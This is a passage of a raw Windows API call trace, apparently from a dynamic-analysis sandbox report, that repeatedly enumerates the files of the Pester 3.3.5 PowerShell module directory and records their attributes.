nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Examples", cAlternateFileName="")) returned 1 [0280.794] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3246caf, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x3246caf, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Functions", cAlternateFileName="FUNCTI~1")) returned 1 [0280.794] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eff43a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4eff43a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4eff43a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x263, dwReserved0=0x0, dwReserved1=0x0, cFileName="LICENSE", cAlternateFileName="")) returned 1 [0280.794] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eff43a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4eff43a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4eff43a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x16f7, dwReserved0=0x0, dwReserved1=0x0, cFileName="nunit_schema_2.5.xsd", cAlternateFileName="")) returned 1 [0280.794] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5d23d2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4e5d23d2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4e5d23d2, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x731, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.nuspec", cAlternateFileName="")) returned 1 [0280.795] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x35e5, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.psd1", cAlternateFileName="")) returned 1 [0280.795] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x62de, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.psm1", cAlternateFileName="")) returned 1 [0280.795] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5d23d2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4e5d23d2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4e5f862d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4b06, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.Tests.ps1", cAlternateFileName="")) returned 1 [0280.795] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5d23d2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4e5d23d2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4e5d23d2, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1124, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.md", cAlternateFileName="")) returned 1 [0280.795] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x329315c, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x329315c, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Snippets", cAlternateFileName="")) returned 1 [0280.796] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0280.796] FindClose (in: hFindFile=0x25b73cd2b50 | out: hFindFile=0x25b73cd2b50) returned 1 [0280.796] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c7f0) returned 1 [0280.796] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c7b0) returned 1 [0280.796] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8c8c0) returned 1 [0280.796] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", nBufferLength=0x105, lpBuffer=0x653ef8c3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", lpFilePart=0x0) returned 0x37 [0280.796] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\*"), lpFindFileData=0x653ef8c5d0 | out: lpFindFileData=0x653ef8c5d0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73cd2c10 [0280.797] FindNextFileW (in: hFindFile=0x25b73cd2c10, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0280.797] FindNextFileW (in: hFindFile=0x25b73cd2c10, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="bin", cAlternateFileName="")) returned 1 [0280.797] FindNextFileW (in: hFindFile=0x25b73cd2c10, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2c1e, dwReserved0=0x0, dwReserved1=0x0, cFileName="build.psake.ps1", cAlternateFileName="")) returned 1 [0280.797] FindNextFileW (in: hFindFile=0x25b73cd2c10, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eff43a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4eff43a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4eff43a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2756, dwReserved0=0x0, dwReserved1=0x0, cFileName="CHANGELOG.md", cAlternateFileName="")) returned 1 [0280.797] FindNextFileW (in: hFindFile=0x25b73cd2c10, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0280.798] FindNextFileW (in: hFindFile=0x25b73cd2c10, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Examples", cAlternateFileName="")) returned 1 [0280.798] FindNextFileW (in: hFindFile=0x25b73cd2c10, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3246caf, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x3246caf, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Functions", cAlternateFileName="FUNCTI~1")) returned 1 [0280.798] FindNextFileW (in: hFindFile=0x25b73cd2c10, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eff43a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4eff43a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4eff43a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x263, dwReserved0=0x0, dwReserved1=0x0, cFileName="LICENSE", cAlternateFileName="")) returned 1 [0280.798] FindNextFileW (in: hFindFile=0x25b73cd2c10, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eff43a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4eff43a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4eff43a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x16f7, dwReserved0=0x0, dwReserved1=0x0, cFileName="nunit_schema_2.5.xsd", cAlternateFileName="")) returned 1 [0280.798] FindNextFileW (in: hFindFile=0x25b73cd2c10, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5d23d2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4e5d23d2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4e5d23d2, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x731, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.nuspec", cAlternateFileName="")) returned 1 [0280.799] FindNextFileW (in: hFindFile=0x25b73cd2c10, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x35e5, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.psd1", cAlternateFileName="")) returned 1 [0280.799] FindNextFileW (in: hFindFile=0x25b73cd2c10, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x62de, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.psm1", cAlternateFileName="")) returned 1 [0280.799] FindNextFileW (in: hFindFile=0x25b73cd2c10, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5d23d2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4e5d23d2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4e5f862d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4b06, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.Tests.ps1", cAlternateFileName="")) returned 1 [0280.799] FindNextFileW (in: hFindFile=0x25b73cd2c10, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5d23d2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4e5d23d2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4e5d23d2, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1124, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.md", cAlternateFileName="")) returned 1 [0280.799] FindNextFileW (in: hFindFile=0x25b73cd2c10, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x329315c, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x329315c, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Snippets", cAlternateFileName="")) returned 1 [0280.799] FindNextFileW (in: hFindFile=0x25b73cd2c10, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x329315c, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x329315c, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Snippets", cAlternateFileName="")) returned 0 [0280.800] FindClose (in: hFindFile=0x25b73cd2c10 | out: hFindFile=0x25b73cd2c10) returned 1 [0280.800] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c7f0) returned 1 [0280.800] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c7b0) returned 1 [0280.800] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", nBufferLength=0x105, lpBuffer=0x653ef8c480, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", lpFilePart=0x0) returned 0x37 [0280.800] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8c8d0) returned 1 [0280.800] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5"), fInfoLevelId=0x0, lpFileInformation=0x653ef8c9b0 | out: lpFileInformation=0x653ef8c9b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0280.800] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c890) returned 1 [0280.800] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8c920) returned 1 [0280.800] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", nBufferLength=0x105, lpBuffer=0x653ef8c400, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", lpFilePart=0x0) returned 0x37 [0280.800] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\*"), lpFindFileData=0x653ef8c630 | out: lpFindFileData=0x653ef8c630*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73cd2b50 [0280.801] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c5f0 | out: lpFindFileData=0x653ef8c5f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0280.801] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c5f0 | out: lpFindFileData=0x653ef8c5f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="bin", cAlternateFileName="")) returned 1 [0280.801] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c5f0 | out: lpFindFileData=0x653ef8c5f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2c1e, dwReserved0=0x0, dwReserved1=0x0, cFileName="build.psake.ps1", cAlternateFileName="")) returned 1 [0280.801] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c5f0 | out: lpFindFileData=0x653ef8c5f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eff43a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4eff43a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4eff43a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2756, dwReserved0=0x0, dwReserved1=0x0, cFileName="CHANGELOG.md", cAlternateFileName="")) returned 1 [0280.802] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c5f0 | out: lpFindFileData=0x653ef8c5f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0280.802] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c5f0 | out: lpFindFileData=0x653ef8c5f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Examples", cAlternateFileName="")) returned 1 [0280.802] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c5f0 | out: lpFindFileData=0x653ef8c5f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3246caf, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x3246caf, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Functions", cAlternateFileName="FUNCTI~1")) returned 1 [0280.802] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c5f0 | out: lpFindFileData=0x653ef8c5f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eff43a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4eff43a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4eff43a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x263, dwReserved0=0x0, dwReserved1=0x0, cFileName="LICENSE", cAlternateFileName="")) returned 1 [0280.802] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c5f0 | out: lpFindFileData=0x653ef8c5f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eff43a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4eff43a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4eff43a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x16f7, dwReserved0=0x0, dwReserved1=0x0, cFileName="nunit_schema_2.5.xsd", cAlternateFileName="")) returned 1 [0280.803] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c5f0 | out: lpFindFileData=0x653ef8c5f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5d23d2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4e5d23d2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4e5d23d2, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x731, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.nuspec", cAlternateFileName="")) returned 1 [0280.803] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c5f0 | out: lpFindFileData=0x653ef8c5f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x35e5, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.psd1", cAlternateFileName="")) returned 1 [0280.803] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c5f0 | out: lpFindFileData=0x653ef8c5f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x62de, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.psm1", cAlternateFileName="")) returned 1 [0280.803] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c5f0 | out: lpFindFileData=0x653ef8c5f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5d23d2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4e5d23d2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4e5f862d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4b06, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.Tests.ps1", cAlternateFileName="")) returned 1 [0280.803] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c5f0 | out: lpFindFileData=0x653ef8c5f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5d23d2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4e5d23d2, ftLastAccessTime.dwHighDateTime=0x1d112e3, 